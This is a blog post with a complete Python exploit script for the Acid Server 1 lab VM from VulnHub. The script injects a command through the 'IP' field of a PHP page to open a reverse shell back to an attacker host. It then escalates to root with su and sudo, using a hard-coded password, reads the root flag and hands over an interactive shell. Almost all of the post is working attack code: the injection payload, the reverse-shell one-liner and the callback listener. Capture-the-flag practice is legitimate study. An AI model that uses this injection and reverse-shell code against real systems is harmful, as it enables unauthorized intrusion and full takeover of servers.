Friday, August 21, 2015

Everybody Loves Acid... Acid Server 1, of course!

I've written a script which roots a fresh install of Acid Server 1 (https://www.vulnhub.com/entry/acid-server-1,125/). It exploits the command injection in the `IP` field of `/Challenge/Magic_Box/low.php` to get a reverse shell, then escalates with the `saman` account's password and `sudo -i`. Adjust `rhost`/`lhost` to your lab addresses before running. It is pretty easy to follow along and finishes with a root shell.



from urllib import urlencode
import urllib
import urllib2
import socket
import sys
import threading
import time
# --- Target / attacker endpoints -------------------------------------------
# Acid Server 1: the vulnerable "Magic Box" page listens on a non-standard port.
rhost = "192.168.12.131"
rport = 33447
# Where the reverse shell calls back to; must be reachable from the VM.
lhost = "192.168.12.129"
lport = 4444

# Payload for the injectable `IP` field.  The leading "1;" closes off whatever
# command the page wraps the value in, and the rest spawns a Python reverse
# shell back to lhost:lport with stdin/stdout/stderr dup'ed onto the socket.
revcmd = "1;python -c '%s'" % (
    "import socket,subprocess,os;"
    "s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);"
    's.connect(("%s",%d));'
    "os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);"
    'p=subprocess.call(["/bin/sh","-i"]);' % (lhost, lport)
)

# Form fields POSTed to low.php: `submit` is sent alongside `IP`, which carries
# the payload above.
postfields = {
    "submit": 1337,
    "IP": revcmd,
}
url = "http://{0}:{1}/Challenge/Magic_Box/low.php".format(rhost, rport)

# Listener for the callback (bound and accepted in rev_hndlr).  The 10 s
# timeout applies to accept(): if the target never calls back, accept()
# raises socket.timeout instead of blocking forever.
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.settimeout(10)
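def get_all_response(client, delay=0.5, chunk=100, idle=2.0):
    """Drain whatever the remote shell has written so far and echo it locally.

    Sleeps ``delay`` seconds first so the command just sent has time to produce
    output, then reads ``chunk``-byte pieces until a short read (the shell is
    most likely sitting at its prompt), the peer closes, or nothing arrives for
    ``idle`` seconds.  The idle timeout is what stops the loop from blocking
    forever when the output happens to be an exact multiple of ``chunk`` bytes
    (the accepted socket is otherwise fully blocking).

    :param client: connected socket, or anything with ``recv``, ``gettimeout``
        and ``settimeout``.
    :returns: the bytes read; they are also printed.
    """
    time.sleep(delay)
    saved_timeout = client.gettimeout()
    client.settimeout(idle)
    pieces = []
    try:
        while True:
            try:
                data = client.recv(chunk)
            except socket.timeout:
                break  # nothing more arrived within `idle` seconds
            if not data:
                break  # peer closed the connection
            pieces.append(data)
            if len(data) < chunk:
                break  # short read: assume the shell is waiting for input
    finally:
        # Restore the caller's blocking mode so later send()/recv() behave as before.
        client.settimeout(saved_timeout)
    response = b"".join(pieces)
    print(response)
    return response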
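def loop_me(client):
    """Hand the reverse shell over to the operator as a simple read/send loop.

    Each line typed locally is sent to the remote shell and the reply drained
    with :func:`get_all_response`.  Typing ``exit`` (or hitting Ctrl-D) sends
    ``exit`` to the remote side, returns, and closes the socket on the way out.

    :param client: the connected reverse-shell socket.
    """
    print("dropping into root shell")
    try:
        while True:
            try:
                inpt = raw_input("> ")
            except EOFError:
                inpt = "exit"  # Ctrl-D: leave the remote shell cleanly instead of tracing back
            # sendall() retries on partial writes; send() would silently drop the rest.
            client.sendall(inpt + "\n")
            get_all_response(client)
            if inpt == "exit":
                break
    finally:
        client.close()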
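def rev_hndlr(expected_peer=None):
    """Listener thread: catch the reverse shell and walk it up to root.

    Binds the module-level listener ``s`` to ``lhost:lport``, waits for the
    target to call back, upgrades the shell to a pty, then replays the VM's
    hard-coded ``saman`` / sudo password.  Finally it prints the root flag and
    drops into :func:`loop_me`.

    :param expected_peer: IP the callback must come from; defaults to ``rhost``.
        Connections from any other address are closed and ignored - the first
        thing this function does with a connection is type a password into it,
        so a stray or hostile client on the same network must not be accepted.
        Pass the NAT/gateway address explicitly if the VM is behind one.
    """
    import os  # only for os._exit below

    if expected_peer is None:
        expected_peer = rhost
    password = "1337hax0r"  # saman's password; also what sudo asks for

    # SO_REUSEADDR lets the script be re-run while the previous connection's
    # socket is still in TIME_WAIT instead of failing with "Address already in use".
    s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    try:
        s.bind((lhost, lport))
    except socket.error as msg:
        print("Bind failed: %s" % msg)
        # sys.exit() from a worker thread only ends this thread; main() would
        # still fire the exploit with nobody listening, so stop the whole process.
        os._exit(1)
    print("Socket bind complete")
    s.listen(10)
    print("Socket now listening")

    # accept() honours the listener's timeout (set at module level), so a
    # target that never calls back ends this thread with a message rather
    # than a traceback.
    while True:
        try:
            client_sock, addr = s.accept()
        except socket.timeout:
            print("No callback from %s within the listener timeout; giving up" % expected_peer)
            return
        if addr[0] == expected_peer:
            break
        print("[!] Ignoring unexpected connection from %s:%d" % (addr[0], addr[1]))
        client_sock.close()
    print("[==>] Received incoming connection from %s:%d" % (addr[0], addr[1]))
    get_all_response(client_sock)

    # Upgrade to a pty: su/sudo typically insist on a terminal to read a password.
    client_sock.sendall("python -c 'import pty;pty.spawn(\"/bin/bash\") '\n")
    get_all_response(client_sock)

    client_sock.sendall("su saman\n")
    get_all_response(client_sock)
    print(password)
    client_sock.sendall(password + "\n")
    get_all_response(client_sock)

    client_sock.sendall("sudo -i\n")
    get_all_response(client_sock)
    client_sock.sendall(password + "\n")
    print(password)
    get_all_response(client_sock)

    client_sock.sendall("cat /root/flag.txt\n")
    get_all_response(client_sock)
    loop_me(client_sock)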
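def main():
    """Start the listener thread, then trigger the injection over HTTP.

    The POST to ``url`` carries ``postfields`` (the ``IP`` field holds the
    reverse-shell payload).  The request normally does not return while the
    shell is alive - the vulnerable page is still waiting for the injected
    command to finish - so all the interactive work happens in the listener
    thread started here.
    """
    rev_thread = threading.Thread(target=rev_hndlr)
    rev_thread.start()
    # Give the listener a moment to bind before the target tries to call back;
    # firing immediately races the thread and can lose the shell to a refused connect.
    time.sleep(1)

    params = urlencode(postfields)
    print(params)
    print("Params encoded")
    print("URL (%s) opening with params (%s)" % (url, urllib.unquote(params).decode("utf8")))
    try:
        body = urllib2.urlopen(url, data=params).read()
    except urllib2.URLError as err:
        # Target down or wrong host:port - report it instead of tracing back
        # while the listener thread keeps waiting for a callback.
        print("Request to %s failed: %s" % (url, err))
        return
    print(body)
    print("URL (%s) opened" % url)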
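if __name__ == "__main__":
    # Guard the entry point so importing this file (e.g. to reuse the helpers)
    # does not fire the exploit.
    main()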
I'll see if I can get some comments put in there later. Thanks @m_avinash143, it was fun!
